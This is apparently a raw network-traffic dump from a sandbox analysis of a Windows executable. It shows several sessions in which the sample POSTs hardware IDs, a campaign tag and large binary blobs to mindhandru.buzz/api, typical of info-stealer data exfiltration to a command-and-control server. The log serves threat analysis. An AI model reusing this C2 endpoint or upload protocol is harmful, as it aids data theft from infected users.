                                                                                                              2024-12-27 13:53:27 UTC1369INData Raw: 32 63 36 37 0d 0a 44 74 66 43 4a 55 75 59 61 50 33 6d 4c 4c 68 71 51 33 44 58 44 70 4c 7a 49 74 49 69 79 50 32 34 6a 4e 4f 43 33 36 30 63 35 4e 43 65 68 64 4c 68 7a 78 6d 78 5a 6e 74 38 37 6e 38 54 59 49 77 47 77 4c 50 78 6c 6a 63 61 75 69 35 63 46 4a 46 49 65 4a 30 33 68 42 6e 55 52 43 6f 66 32 6d 37 6d 49 53 70 72 4c 6f 43 30 7a 73 6d 43 39 76 4d 53 4e 6f 32 67 37 5a 2b 57 6c 77 33 74 48 72 51 56 69 68 4a 47 4e 39 2f 4a 65 72 6e 6b 72 6e 6d 6f 51 2f 41 57 58 56 58 79 6f 56 48 69 32 33 6b 39 43 45 53 43 7a 53 30 62 4e 41 58 61 77 4e 61 6c 7a 77 33 2b 4f 44 30 31 35 72 39 58 4a 59 4a 4e 55 66 37 77 45 72 4d 4f 2b 72 73 66 42 77 54 48 37 52 38 30 47 38 6d 55 56 44 52 5a 32 48 4f 70 4d 54 6e 73 2b 78 4c 33 69 41 69 41 39 44 4d 54 6f 6c 56 72 37 68 30 48 41
                                                                                                              Data Ascii: 2c67DtfCJUuYaP3mLLhqQ3DXDpLzItIiyP24jNOC360c5NCehdLhzxmxZnt87n8TYIwGwLPxljcaui5cFJFIeJ03hBnURCof2m7mISprLoC0zsmC9vMSNo2g7Z+Wlw3tHrQVihJGN9/JernkrnmoQ/AWXVXyoVHi23k9CESCzS0bNAXawNalzw3+OD015r9XJYJNUf7wErMO+rsfBwTH7R80G8mUVDRZ2HOpMTns+xL3iAiA9DMTolVr7h0HA
                                                                                                              2024-12-27 13:53:27 UTC1369INData Raw: 79 42 41 76 45 6c 71 44 4f 53 4c 74 70 49 33 58 69 74 31 55 6c 41 38 7a 46 63 4c 45 45 65 56 4e 68 5a 4a 4e 53 55 67 6f 2b 6a 4f 47 51 53 68 66 43 4a 35 2f 65 63 4c 6e 67 71 6d 4c 74 42 71 4c 54 6e 31 46 34 4d 68 51 78 58 79 79 76 54 35 37 52 53 48 31 49 6f 42 48 5a 31 35 6d 70 78 35 68 74 65 66 4d 71 65 79 6f 46 4e 4d 4b 4e 45 57 4e 6d 77 79 51 4c 76 66 37 49 77 35 55 61 4f 31 30 68 68 41 77 51 77 62 52 4c 57 47 6a 35 34 33 71 70 75 68 63 6b 42 67 6d 51 75 76 31 65 63 56 38 70 62 70 6a 55 55 63 48 39 79 57 61 62 6c 59 45 53 35 38 78 4a 75 32 32 69 71 66 30 39 52 72 4c 4e 32 56 4e 6c 66 51 51 69 32 50 6b 39 44 4e 70 53 43 6a 36 4d 34 5a 42 4a 54 5a 47 6c 6a 34 33 36 36 72 47 79 4c 66 72 55 4e 4e 41 5a 51 4f 56 6b 77 79 46 4f 36 43 39 4d 77 51 62 64 4b 39
                                                                                                              Data Ascii: yBAvElqDOSLtpI3Xit1UlA8zFcLEEeVNhZJNSUgo+jOGQShfCJ5/ecLngqmLtBqLTn1F4MhQxXyyvT57RSH1IoBHZ15mpx5htefMqeyoFNMKNEWNmwyQLvf7Iw5UaO10hhAwQwbRLWGj543qpuhckBgmQuv1ecV8pbpjUUcH9yWablYES58xJu22iqf09RrLN2VNlfQQi2Pk9DNpSCj6M4ZBJTZGlj4366rGyLfrUNNAZQOVkwyFO6C9MwQbdK9


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.949708104.21.11.1014436596C:\Users\user\Desktop\Wvo9FU4qo9.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 13:53:30 UTC281OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=WUVI3FHSMML5APVA03
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 12845
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 13:53:30 UTC12845OUTData Raw: 2d 2d 57 55 56 49 33 46 48 53 4d 4d 4c 35 41 50 56 41 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 42 41 36 41 39 36 43 41 31 45 46 46 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 57 55 56 49 33 46 48 53 4d 4d 4c 35 41 50 56 41 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 55 56 49 33 46 48 53 4d 4d 4c 35 41 50 56 41 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                              Data Ascii: --WUVI3FHSMML5APVA03Content-Disposition: form-data; name="hwid"1CBA6A96CA1EFF19BEBA0C6A975F1733--WUVI3FHSMML5APVA03Content-Disposition: form-data; name="pid"2--WUVI3FHSMML5APVA03Content-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                              2024-12-27 13:53:30 UTC1133INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 13:53:30 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=iradq60jj40f6tv4oh6k7oloij; expires=Tue, 22 Apr 2025 07:40:09 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yXBTnWEUTnsoBDeUmlFN3LZ%2FhNseyM3iAMcYOjtmICJWjM43u5tT%2F%2BorBg0RyYoIfsI2x3HujORIoUoafZ%2BkMC%2FviR%2FcgKT8MMj4qqbMQYO6X8QuGodFxBaHBUhtiJYrp48%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f89cc144c507c93-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1783&rtt_var=683&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13784&delivery_rate=1586956&cwnd=210&unsent_bytes=0&cid=f87f06c5331a16fe&ts=851&x=0"
                                                                                                              2024-12-27 13:53:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 13:53:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.949709104.21.11.1014436596C:\Users\user\Desktop\Wvo9FU4qo9.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 13:53:32 UTC278OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=5FN8ST4A6706JWP
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 15045
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 13:53:32 UTC15045OUTData Raw: 2d 2d 35 46 4e 38 53 54 34 41 36 37 30 36 4a 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 42 41 36 41 39 36 43 41 31 45 46 46 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 46 4e 38 53 54 34 41 36 37 30 36 4a 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 46 4e 38 53 54 34 41 36 37 30 36 4a 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 35 46 4e 38 53
                                                                                                              Data Ascii: --5FN8ST4A6706JWPContent-Disposition: form-data; name="hwid"1CBA6A96CA1EFF19BEBA0C6A975F1733--5FN8ST4A6706JWPContent-Disposition: form-data; name="pid"2--5FN8ST4A6706JWPContent-Disposition: form-data; name="lid"PsFKDg--pablo--5FN8S
                                                                                                              2024-12-27 13:53:33 UTC1124INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 13:53:33 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=21ktrgo4t35hfos8rlhbpe1o5k; expires=Tue, 22 Apr 2025 07:40:11 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4pPMY6T0n4781zZUa41xpjyYD4ydYJzLKTcsLRFonJ%2FrUDvDWM0VKX0I13h2HqOjyMxmp57dp3gkIFDLUsZifTxGd2dr3H6K4mLDxciw1SgJ8OpNUKsqKRcgDLmP9wSwiU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f89cc22acb7426b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2437&min_rtt=2145&rtt_var=1013&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15981&delivery_rate=1361305&cwnd=232&unsent_bytes=0&cid=4210c8c5aa389653&ts=854&x=0"
                                                                                                              2024-12-27 13:53:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 13:53:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.949710104.21.11.1014436596C:\Users\user\Desktop\Wvo9FU4qo9.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 13:53:34 UTC276OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=4FKDDQ2WHQ9K9
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20549
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 13:53:34 UTC15331OUTData Raw: 2d 2d 34 46 4b 44 44 51 32 57 48 51 39 4b 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 42 41 36 41 39 36 43 41 31 45 46 46 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 34 46 4b 44 44 51 32 57 48 51 39 4b 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 46 4b 44 44 51 32 57 48 51 39 4b 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 34 46 4b 44 44 51 32 57 48 51 39
                                                                                                              Data Ascii: --4FKDDQ2WHQ9K9Content-Disposition: form-data; name="hwid"1CBA6A96CA1EFF19BEBA0C6A975F1733--4FKDDQ2WHQ9K9Content-Disposition: form-data; name="pid"3--4FKDDQ2WHQ9K9Content-Disposition: form-data; name="lid"PsFKDg--pablo--4FKDDQ2WHQ9
                                                                                                              2024-12-27 13:53:34 UTC5218OUTData Raw: ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd 4f 03 00 00 00 00 00
                                                                                                              Data Ascii: Z+?:us}Q0u?4E([:s~X`nO
                                                                                                              2024-12-27 13:53:36 UTC1132INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 13:53:35 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=j433f988clcub4p9qtekbeofm5; expires=Tue, 22 Apr 2025 07:40:14 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J9k2bA%2B3KPQtGGwake9Md%2FBfda%2BlMIxE2nYRNfHFGoYp%2FzvV7lZgIGvz9GdUHGBG5p9sfzJRMF3BwnCblmPLE5Ih%2FF3e8SMV0ZaDbWQ2F58nittxXfpPCCV7VIj1hxVNstc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f89cc33a98bde97-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1671&rtt_var=645&sent=16&recv=28&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21505&delivery_rate=1671436&cwnd=231&unsent_bytes=0&cid=acf3a732c21438d2&ts=1419&x=0"
                                                                                                              2024-12-27 13:53:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 13:53:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.949712104.21.11.1014436596C:\Users\user\Desktop\Wvo9FU4qo9.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 13:53:37 UTC273OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=QX3UE1VKMK0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1178
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 13:53:37 UTC1178OUTData Raw: 2d 2d 51 58 33 55 45 31 56 4b 4d 4b 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 42 41 36 41 39 36 43 41 31 45 46 46 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 51 58 33 55 45 31 56 4b 4d 4b 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 58 33 55 45 31 56 4b 4d 4b 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 51 58 33 55 45 31 56 4b 4d 4b 30 0d 0a 43 6f 6e 74
                                                                                                              Data Ascii: --QX3UE1VKMK0Content-Disposition: form-data; name="hwid"1CBA6A96CA1EFF19BEBA0C6A975F1733--QX3UE1VKMK0Content-Disposition: form-data; name="pid"1--QX3UE1VKMK0Content-Disposition: form-data; name="lid"PsFKDg--pablo--QX3UE1VKMK0Cont
                                                                                                              2024-12-27 13:53:38 UTC1128INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 13:53:38 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=rpcvsmj9np6465hi79bf7kvp5l; expires=Tue, 22 Apr 2025 07:40:17 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aIWOBmsZLgBEdGqlSgkZ896AfQcvz02L0I1xD0A0nc%2Fg0%2Fkwm3wmJE81zhVl52Y25wRpFnBk3YMxJmzyA0%2Bodv08aRi%2Fw3UoGnKIjFwg6O7Nf0DSGTgAnF%2FxbuMzPEGnjic%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f89cc44597c42c0-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1633&rtt_var=649&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2087&delivery_rate=1788120&cwnd=212&unsent_bytes=0&cid=15b9223706833a74&ts=757&x=0"
                                                                                                              2024-12-27 13:53:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 13:53:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.949714104.21.11.1014436596C:\Users\user\Desktop\Wvo9FU4qo9.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 13:53:40 UTC275OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=A4F5BK7ZNQI
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 552278
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: 2d 2d 41 34 46 35 42 4b 37 5a 4e 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 42 41 36 41 39 36 43 41 31 45 46 46 31 39 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 41 34 46 35 42 4b 37 5a 4e 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 34 46 35 42 4b 37 5a 4e 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 41 34 46 35 42 4b 37 5a 4e 51 49 0d 0a 43 6f 6e 74
                                                                                                              Data Ascii: --A4F5BK7ZNQIContent-Disposition: form-data; name="hwid"1CBA6A96CA1EFF19BEBA0C6A975F1733--A4F5BK7ZNQIContent-Disposition: form-data; name="pid"1--A4F5BK7ZNQIContent-Disposition: form-data; name="lid"PsFKDg--pablo--A4F5BK7ZNQICont
                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: 23 c3 93 a7 25 5f 08 66 2e 25 1c 31 90 d7 64 7f d3 24 e9 cf 1d eb 32 3b ea c2 59 f0 ee ab a4 4b 4c 7a 1f 26 e4 bf 95 43 05 24 34 86 8b 8f 7b a9 b6 69 1e 72 37 7a d9 86 68 30 54 91 e5 3b 37 26 6c 98 fc 39 48 bd dd 82 9f 98 17 97 b9 88 0a da 7f 1f 52 3e dc 72 0a e6 15 86 78 c9 3d cf 84 3d e4 35 81 da 31 50 82 18 bb 27 b5 a4 89 86 f9 a7 65 80 19 73 f4 63 ed ce b4 d6 f0 3c 44 77 0f a5 22 45 c8 2d 5b 83 d5 c1 59 81 1e d3 1f 74 69 cc f9 82 76 1e 49 fa 3d 41 99 a1 c7 aa 39 be 16 9e 21 be 96 20 4f 77 ad db 31 0a be b5 1f 68 5f a3 df fa 0f d0 1e 79 8a 30 c4 08 97 73 3d b2 53 e7 ee a0 c6 2a 85 46 4e f5 0c f0 c0 a3 a3 df 2d 9f 1c 1c ac f8 30 f9 dc c3 e3 fd c0 ab 80 ed 0a 27 b7 27 59 25 5a 17 d7 3e f4 5c da 1c 79 aa 2b b8 17 9c ae ae b8 91 8b 86 53 9e 46 51 42 e8 14
                                                                                                              Data Ascii: #%_f.%1d$2;YKLz&C$4{ir7zh0T;7&l9HR>rx==51P'esc<Dw"E-[YtivI=A9! Ow1h_y0s=S*FN-0''Y%Z>\y+SFQB
                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: fd b1 58 e5 0d 27 2f b3 d1 fb ae 08 7b b1 b8 ee 09 fd 08 dd 90 90 52 79 ea d7 7f 29 0d 57 17 f9 f8 6f d7 d9 cb 7a c5 e7 e1 c0 a3 1c 1a c0 08 8a a1 4a 5f eb 25 e0 e2 e3 48 27 ef 5e d9 f3 4a b0 36 59 d5 35 25 bc ec 55 42 58 19 b5 47 dc d5 85 a3 20 2f 70 e3 04 25 1a 55 2f 9e e9 8d ee ec a7 46 84 46 50 71 8a 75 a8 7b 01 c2 6e fe 3c 22 8e b1 52 17 82 ec cd 4f 62 04 21 9e c7 27 de b9 08 56 a2 3c a3 7f 21 de 79 c9 e3 73 f9 e6 4a 1b 7d 11 3a fc 33 a5 89 4c b1 8d 65 1d 83 69 f9 bf 43 15 46 c2 35 65 f3 e3 5c b9 08 24 25 22 88 37 77 d3 be 8e 54 ce 2a dc 49 ec 4d fe 99 11 47 94 fd 35 cf 7f a4 a6 7e 27 6d 6d 0f 27 50 cf d5 d9 72 54 21 3e ca 0d 33 bd 13 b5 45 cc a8 9f e2 f9 55 3d 12 ee 12 19 e8 5f 1d 40 7f e8 4e 6c f3 12 ae 93 8e 0b ba d7 be ac 41 99 74 27 d5 e9 35 06
                                                                                                              Data Ascii: X'/{Ry)WozJ_%H'^J6Y5%UBXG /p%U/FFPqu{n<"ROb!'V<!ysJ}:3LeiCF5e\$%"7wT*IMG5~'mm'PrT!>3EU=_@NlAt'5
                                                                                                              2024-12-27 13:53:40 UTC15331OUTData Raw: 70 06 56 e2 10 46 62 c6 e4 51 b4 b8 4c 00 ec 8c 48 74 57 70 d3 fb cd eb 7c 5c e8 4a ba 21 38 ea 08 fb b7 76 4f d6 62 db e6 17 4f 06 9a 97 ab 31 d8 9e 61 d7 52 17 7b 6b 2b 81 aa 6d 97 e3 ca e2 e7 56 19 e6 af b1 59 ff cf 66 55 6f 79 c6 88 b8 82 b1 9a 18 76 55 8e f1 e4 bf 2a ad 3f 1d 60 18 fe 34 1b ee b4 50 ba e1 78 fd af 4b d5 58 7d ef 77 27 3b c3 f1 b7 21 0b 97 b8 82 aa b6 91 37 3f ad 57 8e 72 47 4b 6f dc 9f 2c 0f 8a 99 5c 6b f9 17 a0 f7 dc bb 96 ab 23 3c dc 8a d7 16 3d 5e f3 fb 54 f5 ec 1e 22 d4 07 e0 f3 a7 aa 76 51 a9 dc a3 20 bc a3 94 f2 ae 88 ff e3 ee 4d 81 b2 b0 06 7e c9 cc af 87 52 f0 00 0f 9b 0f a5 9f ef 0b 06 81 22 83 f7 5b a6 79 6b f4 57 76 b7 15 b6 be ca f8 ce 07 4e e7 06 be 42 54 07 09 9c 25 fc 3f a7 ad 23 22 64 00 a9 d6 a8 ff eb f2 3c 7d 19 87
                                                                                                              Data Ascii: pVFbQLHtWp|\J!8vObO1aR{k+mVYfUoyvU*?`4PxKX}w';!7?WrGKo,\k#<=^T"vQ M~R"[ykWvNBT%?#"d<}
